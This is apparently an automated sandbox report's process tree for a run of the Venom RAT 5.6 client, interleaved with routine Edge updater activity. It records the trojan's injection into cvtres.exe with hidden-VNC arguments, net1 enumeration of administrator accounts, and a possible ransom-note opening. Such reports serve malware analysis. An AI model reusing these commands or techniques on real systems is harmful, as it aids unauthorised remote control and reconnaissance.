C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUQ0QjE1RDgtOTA2OS00ODIwLUEwRDUtOTQ1RTQ5N0Y0NjE1fSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7QjBGRTUzMjItNjUzMi00MzRCLTg0RTQtMDA2NERGRTg4RDBEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtxV0pTeld3UGZkY0xSK1hHSXY2eHJaZmlZT3hoUFUyczFOV21qV2NhRlBnPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTY5LjMxIiBuZXh0dmVyc2lvbj0iMS4zLjE3MS4zOSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjaHJvbWVyZWMzPTIwMjMwNlIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRldGltZT0iMTY3NTc5MDIyNyI-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1OTUwNjIyNDEiLz48L2FwcD48L3JlcXVlc3Q-4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjkuMzEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUQ0QjE1RDgtOTA2OS00ODIwLUEwRDUtOTQ1RTQ5N0Y0NjE1fSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0iY2hyb21lcmVjb3ZlcnkiIHJlcXVlc3RpZD0ie0RBMEREQ0YxLTU2MTEtNEE1Mi1BRDM3LTZCRjc5NkM2RjA4NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSIyIiBwaHlzbWVtb3J5PSI0IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDEuMTI4OCIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSJEQURZIiBwcm9kdWN0X25hbWU9IlN0YW5kYXJkIFBDIChRMzUgKyBJQ0g5LCAyMDA5KSIvPjxleHAgZXRhZz0iJnF1b3Q7VlBRb1AxRitmcTE1d1J6aDFrUEw0UE1wV2g4T1JNQjVpenZyT0MvY2hqUT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE2OS4zMSIgbmV4dHZlcnNpb249IjEuMy4xNzEuMzkiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iUHJvZHVjdHNUb1JlZ2lzdGVyPSU3QkYzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNSU3RDtjaHJvbWVyZWMzPTIwMjMwNlIiIGluc3RhbGxhZ2U9IjAiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzNTQxNDIyMjEyIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzNTQxNzMyNjcwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIwIiBlcnJvcmNvZGU9Ii0yMTQ3MDIzODM4IiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMzU1MzE0MTY4NSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzL2RiOGM1YmY1LThmNmItNDMxMS1iMTU4LWI2YzRkYTNhZDBkMj9QMT0xNjc2MzkxNDU0JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PWxhUE9USm5Sb3MyJTJmbjMxUUxiN1NIc1ozUEwlMmZ5OCUyZmRNSWN1WGxSeHBKTkxWSDVOeDJKNDNaU0xaJTJmdzRIV3ElMmZnbDBaNTBYM00lMmJjT1E2VG83Um5MUlJRJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjE2Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjEzNTUzMTYxNjkzIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJiaXRzIiB1cmw9Imh0dHA6Ly9tc2VkZ2UuYi50bHUuZGwuZGVsaXZlcnkubXAubWljcm9zb2Z0LmNvbS9maWxlc3RyZWFtaW5nc2VydmljZS9maWxlcy9kYjhjNWJmNS04ZjZiLTQzMTEtYjE1OC1iNmM0ZGEzYWQwZDI_UDE9MTY3NjM5MTQ1NCZhbXA7UDI9NDA0JmFtcDtQMz0yJmFtcDtQND1sYVBPVEpuUm9zMiUyZm4zMVFMYjdTSHNaM1BMJTJmeTglMmZkTUljdVhsUnhwSk5MVkg1TngySjQzWlNMWiUyZnc0SFdxJTJmZ2wwWjUwWDNNJTJiY09RNlRvN1JuTFJSUSUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE1ODcxNjAiIHRvdGFsPSIxNTg3MTYwIiBkb3dubG9hZF90aW1lX21zPSI5MjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTMyMDE2MjgiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTM1NTg1OTE2MjgiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48cGluZyByPSIxNzgiIHJkPSI1NzAzIiBwaW5nX2ZyZXNobmVzcz0iezAwRTEzNkNFLUNCM0EtNDJDNC05OTU3LTkxMTNBNDZCQUIzRn0iLz48L2FwcD48YXBwIGFwcGlkPSJ7NTZFQjE4RjgtQjAwOC00Q0JELUI2RDItOEM5N0ZFN0U5MDYyfSIgdmVyc2lvbj0iOTIuMC45MDIuNjciIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzMjAyNjMzNTEyNDIxMDIwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iLTEiIHI9IjE3OCIgYWQ9Ii0xIiByZD0iNTcwMyIgcGluZ19mcmVzaG5lc3M9Ins3QzM5RDUwQy05N0RCLTQ1MjUtQkExMi0zRTEyQTYzNTg1QjF9Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 416 -p 2340 -ip 23401⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2340 -s 14561⤵
- Program crash
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\ClientH.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\ClientH.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 127.0.0.1 4449 VxcSzXvmB.exe2⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 127.0.0.1 4449 VxcSzXvmB.exe2⤵
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E209F9A4-DA30-4FF3-B134-4F08084F3A8F}\MicrosoftEdge_X64_109.0.1518.78.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E209F9A4-DA30-4FF3-B134-4F08084F3A8F}\MicrosoftEdge_X64_109.0.1518.78.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level2⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E209F9A4-DA30-4FF3-B134-4F08084F3A8F}\EDGEMITMP_DC380.tmp\setup.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E209F9A4-DA30-4FF3-B134-4F08084F3A8F}\EDGEMITMP_DC380.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E209F9A4-DA30-4FF3-B134-4F08084F3A8F}\MicrosoftEdge_X64_109.0.1518.78.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QzFCNzBGODAtRkJGRi00QURBLTlFQzAtMDJEQzg1RUQ4N0YwfSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9InsxODBFRUJCMS1BQjk5LTQxRjktOTlBQS00MzQ4MDA5ODY5NDh9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjEwOS4wLjE1MTguNzgiIGxhbmc9IiIgYnJhbmQ9IkVVRkkiIGNsaWVudD0iIiBleHBlcmltZW50cz0iY29uc2VudD1mYWxzZSIgaW5zdGFsbGFnZT0iLTEiIGluc3RhbGxkYXRlPSItMSI-PHVwZGF0ZWNoZWNrLz48ZXZlbnQgZXZlbnR0eXBlPSI5IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNjU5Mjk4OTA3NyIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE2NTkzMjE5MDUyIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjAiIGVycm9yY29kZT0iLTIxNDcwMjM4MzgiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3MDAwNTQ2MDM5IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiBkb3dubG9hZGVyPSJkbyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvMWQ0Y2IxM2ItYjJkZC00ZmM0LTk0OGQtNWI5ZjE0MjQ4N2Y0P1AxPTE2NzYzOTE3NjAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9SXZHMG1JZE5ETWlPU04lMmJjd0dKSVJOd0R6Z0hmWGs2RiUyZmlQWnVUcklNcGE3VGhIc00xaUV4cWVRQ0JkQnBuNmRKSFpOVUpRWHVJclBiZzB2ZkNWbVNBJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMCIgdG90YWw9IjAiIGRvd25sb2FkX3RpbWVfbXM9IjYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNzAwMDU0NjAzOSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvMWQ0Y2IxM2ItYjJkZC00ZmM0LTk0OGQtNWI5ZjE0MjQ4N2Y0P1AxPTE2NzYzOTE3NjAmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9SXZHMG1JZE5ETWlPU04lMmJjd0dKSVJOd0R6Z0hmWGs2RiUyZmlQWnVUcklNcGE3VGhIc00xaUV4cWVRQ0JkQnBuNmRKSFpOVUpRWHVJclBiZzB2ZkNWbVNBJTNkJTNkIiBzZXJ2ZXJfaXBfaGludD0iIiBjZG5fY2lkPSItMSIgY2RuX2NjYz0iIiBjZG5fbXNlZGdlX3JlZj0iIiBjZG5fYXp1cmVfcmVmX29yaWdpbl9zaGllbGQ9IiIgY2RuX2NhY2hlPSIiIGNkbl9wM3A9IiIgZG93bmxvYWRlZD0iMTQwNzkwMjAwIiB0b3RhbD0iMTQwNzkwMjAwIiBkb3dubG9hZF90aW1lX21zPSIzMzc3NCIvPjxldmVudCBldmVudHR5cGU9IjEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3MDAwNzAyNDA2IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTcwMTkyMjE3NDkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY2MDgiIHN5c3RlbV91cHRpbWVfdGlja3M9IjE3MjExODcwNzA0IiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNDY0IiBkb3dubG9hZF90aW1lX21zPSI0MDY4MSIgZG93bmxvYWRlZD0iMTQwNzkwMjAwIiB0b3RhbD0iMTQwNzkwMjAwIiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSIxOTIyMyIvPjwvYXBwPjwvcmVxdWVzdD42⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator1⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators1⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\ClientsFolder\27230CB0A6DA4D718BCE\Information\Information.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DFACD2D3-8764-42F5-AD4F-EFDCC2CE2FA6}\MicrosoftEdgeUpdateSetup_X86_1.3.173.45.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{DFACD2D3-8764-42F5-AD4F-EFDCC2CE2FA6}\MicrosoftEdgeUpdateSetup_X86_1.3.173.45.exe" /update /sessionid "{1A39311A-8504-4008-BDFA-F6FF86ADA092}"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Temp\EUFDEB.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EUFDEB.tmp\MicrosoftEdgeUpdate.exe" /update /sessionid "{1A39311A-8504-4008-BDFA-F6FF86ADA092}"3⤵
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.173.45\MicrosoftEdgeUpdateComRegisterShell64.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Registers COM server for autorun
- Modifies registry class
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzMuNDUiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUEzOTMxMUEtODUwNC00MDA4LUJERkEtRjZGRjg2QURBMDkyfSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0ic2VsZnVwZGF0ZSIgcmVxdWVzdGlkPSJ7MjhGRTgzNTAtQTM4OC00QkRGLUJDOUItMUI2RUQ2NkRCRDJDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IkRBRFkiIHByb2R1Y3RfbmFtZT0iU3RhbmRhcmQgUEMgKFEzNSArIElDSDksIDIwMDkpIi8-PGV4cCBldGFnPSImcXVvdDtxV0pTeld3UGZkY0xSK1hHSXY2eHJaZmlZT3hoUFUyczFOV21qV2NhRlBnPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTcxLjM5IiBuZXh0dmVyc2lvbj0iMS4zLjE3My40NSIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjaHJvbWVyZWMzPTIwMjMwNlIiIGluc3RhbGxhZ2U9IjAiIGluc3RhbGxkYXRldGltZT0iMTY3NTc5MDIyNyI-PGV2ZW50IGV2ZW50dHlwZT0iMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMTc0OTk3MDE4MDIiLz48L2FwcD48L3JlcXVlc3Q-4⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzEuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjkuMzEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUEzOTMxMUEtODUwNC00MDA4LUJERkEtRjZGRjg2QURBMDkyfSIgdXNlcmlkPSJ7NkE2ODdCNkYtNEVCRi00QTFGLUFDRkEtMEFDQTA1NTVEMjJEfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9IntGQjI1NTk5OC1GNjE0LTREREItODZFQi1BOTM1NkY4QzA3OTR9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHN